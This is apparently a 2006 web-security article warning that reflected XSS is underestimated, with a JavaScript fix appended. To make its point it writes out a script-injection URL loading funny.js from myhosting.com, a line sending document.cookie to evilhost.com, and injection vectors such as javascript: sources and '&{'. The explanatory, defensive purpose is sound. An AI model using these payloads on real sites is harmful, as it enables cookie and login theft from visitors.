
XSS Vulnerabilities, So underestimated, so dangerous



In this little paper I will try to convince admins, webmasters
and in general everyone concerned with securing a web site of
how dangerous an XSS hole can be. I will not cover in depth what
XSS is, because there’s a huge library on this topic available on
the internet and at www.hackerscenter.com/library

--[ 2.0 XSS

So what’s XSS? XSS stands for cross-site scripting, which is a
way to inject script code into a web page, making it execute
whenever the page loads or a specific event is triggered.

2.1 Temporary XSS

One reason this kind of bug is underestimated is the “temporary
XSS”, as I call it. A temporary XSS is script code that is
executed only when the user submits a crafted input containing
that script code.

Example: http://vuln.host.com/search.asp?q=<plaintext>

The above example will inject a “<plaintext>” tag into the
search.asp page, showing the HTML source code of the page. The
point here is: whoever searched for <plaintext> will see the
source code, but this does not imply any permanent alteration of
the page.

2.2 Permanent XSS

A “permanent XSS”, as I call it, is due to unsanitized user
input that is saved, for example, in a database. Each time these
unsanitized fields are read from the database and printed on the
page, the script will be executed. (A lot of registration-form
server-side scripts are affected by this kind of vuln.)

--[ 3.0 Attacks

What I want to demonstrate in this article is how dangerous a
temporary XSS can be. Most webmasters (99%, believe me) treat
this kind of bug as a very, very low-level issue for the reasons
we have seen. They think it is even a waste of time to sanitize
input that doesn’t go into a database.

What they seem unable to understand is that whenever a malicious
user is able to run a client-side script from their domain name,
a cookie-stealing attack can be *easily* carried out. This
becomes a high-level risk vuln when we deal with e-commerce
sites, webmail services and similar.

3.1 Scenario 1

Let’s assume that we’ve found an XSS vuln in 2 sites. The first
will be used as the “dumb” site (A), which has a permanent XSS
hole, while the latter will be a big shopping portal (B) I want
to steal cookies from, which has “just” a little innocent
temporary XSS hole.

We mail the big shopping portal admin about the vuln, trying to
make him understand how serious the bug is. He never replies.
So we decide to have some fun... innocent fun... as innocent as
their XSS hole was, I suppose...

What one could do is inject a stealth script into the dumb site
to force (always stealthily) every visitor of site A to load the
vulnerable URL we have found on site B. Here anyone can
understand that even
http://vuln.host.com/search.asp?q=<plaintext> is now very, very
useful for our purpose. Instead of <plaintext>, we can use
something like this:

http://vuln.host.com/search.asp?q=<script src='http://myhosting.com/xsstrials/funny.js'></script>

Funny.js will be our malicious script code that will be run on
the vuln.host.com domain... and it will be similar to this:

// Funny.js
navigate to 'evilhost.com/collect_cookies.asp?cookie=' + document.cookie
// where collect_cookies.asp will be a server-side script that
// collects everything passed in the parameter “cookie”, and
// evilhost.com can be a hosting space set up by the malicious
// attacker.

So what happens here?

1. A user visits the dumb site, thus triggering our permanent
   XSS.
2. The permanent XSS will load the page
   http://vuln.host.com/search.asp?q=<script src='http://myhosting.com/xsstrials/funny.js'></script>
   which executes funny.js thanks to the temporary XSS hole in
   the big shopping portal.
3. funny.js is now loaded on the big shopping portal domain
   name, letting us steal the cookie (and the login data) of the
   dumb site visitor.

By “stealth script” we mean a script that doesn’t change the
appearance of the page, so that no one will notice any background
work.

--[ Side effects

In this section I will show some side effects of the XSS disease
that are often forgotten or misunderstood by a lot of
analysts/webmasters.

XSS holes, permanent and temporary ones, can be used to attack a
local victim (a visitor of the vulnerable site) directly, by
injecting malicious code capable of exploiting a local
vulnerability of the victim’s system. This has become very common
(and easy to do) because of the tons of vulnerabilities that
affect Internet Explorer and browsers in general.

Let’s take for example an XSS hole in trustedsite.com. Anyone
could take advantage of the trust placed in this domain to
execute code with high privilege levels, executing or installing
malicious ActiveX. This kind of approach can be taken in
Internet Explorer and in general in all the browsers that use
the so-called trusted “Zones”.

Another important issue that can make a simple XSS hole a
high-level risk issue is the capability of attacking thousands
of computers in a few hours or even in minutes, according to the
traffic of the vulnerable page. This kind of practice can lead
to malware/adware spread. If a high-traffic page is vulnerable
to a permanent XSS, a malware/worm/adware coder can choose this
kind of approach to plant the seeds of his worm, making it
spread in a stealthy manner and within a short time.

--[ How to solve the problem

Incredible to say, XSS holes are the simplest to solve and fix.
They usually involve the script tag, but not always.
Less-known code can use the image tag with dynsrc or src
parameters and “javascript:alert('aaa')” as the argument, or the
<style> tag, e.g.:

<style type="text/javascript">script goes here</style>

In general the characters to be sanitized are the usual "<" and
">", but there are some more to be carefully escaped: &{code};
will run the code in Netscape / Mozilla browsers, so the "&{"
combination of chars should be sanitized too. In 99% of the
cases an "HTML Encode" would solve the problem. In ASP it can be
easily done with the built-in function
server.htmlencode(myparameter).

Article's Source: http://articles.org/80563_xss_vulnerabilities_so_understimated_so_dangerous/
Author: admin
Posted On April 19, 2006
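
The fix from "How to solve the problem", as an added example that is not code from the original article: a JavaScript stand-in for the search.asp output, first unencoded and then HTML-encoded, run over the vectors the article names. All function names are hypothetical. The URL scheme allow-list goes beyond the article's text to cover its javascript: image-source case, which HTML encoding alone does not stop.

```javascript
// Added example, not from the original article. Function names are
// hypothetical; htmlEncode plays the role of ASP's Server.HTMLEncode.
function htmlEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// "Before": the q parameter is echoed into the page as-is.
function renderSearchUnencoded(q) {
  return '<p>Results for: ' + q + '</p>';
}

// "After": characters with HTML meaning are encoded before output.
function renderSearchEncoded(q) {
  return '<p>Results for: ' + htmlEncode(q) + '</p>';
}

// HTML encoding does not stop a javascript: URL placed in src/href,
// so a user-supplied URL is also checked against a scheme allow-list.
function safeUrl(value) {
  let parsed;
  try {
    parsed = new URL(String(value).trim());
  } catch (err) {
    return null; // not an absolute URL: reject
  }
  return ['http:', 'https:'].includes(parsed.protocol) ? parsed.href : null;
}

function renderImage(userUrl) {
  const url = safeUrl(userUrl);
  return url === null ? '' : '<img src="' + htmlEncode(url) + '" alt="">';
}

// Counts "<" characters that did not come from the template's own <p> wrapper.
function countInjectedTags(html) {
  return (html.replace(/<\/?p>/g, '').match(/</g) || []).length;
}

// Constructed inputs: the vectors named in the article.
const samples = [
  '<plaintext>',
  "<script src='http://myhosting.com/xsstrials/funny.js'></script>",
  '&{code};',
];
for (const q of samples) {
  console.log(countInjectedTags(renderSearchUnencoded(q)), renderSearchEncoded(q));
}
console.log(JSON.stringify(renderImage("javascript:alert('aaa')")));
```

Encoding is applied at output time, so the same helper covers both the temporary case (the query string) and the permanent case (fields read back from a database).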